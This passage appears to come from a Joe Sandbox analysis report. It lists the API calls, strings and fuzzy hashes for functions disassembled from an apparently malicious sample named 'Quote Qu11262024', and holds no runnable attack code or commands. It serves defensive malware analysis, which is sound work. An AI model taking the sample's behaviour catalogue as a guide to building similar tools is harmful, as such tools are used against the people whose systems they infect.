                                                                                                    • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                    • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                    • memset.MSVCRT ref: 0044505E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memchrmemset
                                                                                                    • String ID: PD$PD
                                                                                                    • API String ID: 1581201632-2312785699
                                                                                                    • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                    • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                    • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                    • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                    • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                    • GetParent.USER32(?), ref: 00409FA5
                                                                                                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 2163313125-0
                                                                                                    • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                    • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                    • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                    • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3592753638-3916222277
                                                                                                    • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                    • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040A47B
                                                                                                    • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                    • wcslen.MSVCRT ref: 0040A4BA
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                    • wcslen.MSVCRT ref: 0040A4E0
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                                                    • String ID: %s (%s)$YV@
                                                                                                    • API String ID: 3979103747-598926743
                                                                                                    • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                    • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                    • API String ID: 2780580303-317687271
                                                                                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                    • wcslen.MSVCRT ref: 0040A6B1
                                                                                                    • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                    • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                    • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                    • API String ID: 2767993716-572158859
                                                                                                    • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                    • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                    • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                    • API String ID: 3176057301-2039793938
                                                                                                    • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                    • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                    • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                    • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                    • unable to open database: %s, xrefs: 0042F84E
                                                                                                    • database is already attached, xrefs: 0042F721
                                                                                                    • database %s is already in use, xrefs: 0042F6C5
                                                                                                    • out of memory, xrefs: 0042F865
                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                    • Opcode ID: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                    • Opcode Fuzzy Hash: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                    • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                    • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                    • String ID: ($d
                                                                                                    • API String ID: 1140211610-1915259565
                                                                                                    • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                    • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                    • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                    • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                    APIs
                                                                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                    • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                    • GetLastError.KERNEL32 ref: 004178FB
                                                                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3015003838-0
                                                                                                    • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                    • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                    • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                    • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00407E44
                                                                                                    • memset.MSVCRT ref: 00407E5B
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                    • wcscpy.MSVCRT ref: 00407F10
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 59245283-0
                                                                                                    • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                    • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                    • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                    • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                    • GetLastError.KERNEL32 ref: 0041855C
                                                                                                    • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                    • GetLastError.KERNEL32 ref: 0041858E
                                                                                                    • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                    • free.MSVCRT ref: 004185AC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2802642348-0
                                                                                                    • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                    • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                    • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                    • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                    • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                    • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                    • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                    • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                    APIs
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                    • memset.MSVCRT ref: 00413ADC
                                                                                                    • memset.MSVCRT ref: 00413AEC
                                                                                                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                    • memset.MSVCRT ref: 00413BD7
                                                                                                    • wcscpy.MSVCRT ref: 00413BF8
                                                                                                    • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                    • String ID: 3A
                                                                                                    • API String ID: 3300951397-293699754
                                                                                                    • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                    • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                    • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                    • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                    • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                    • wcslen.MSVCRT ref: 0040D1D3
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                    • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                    • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
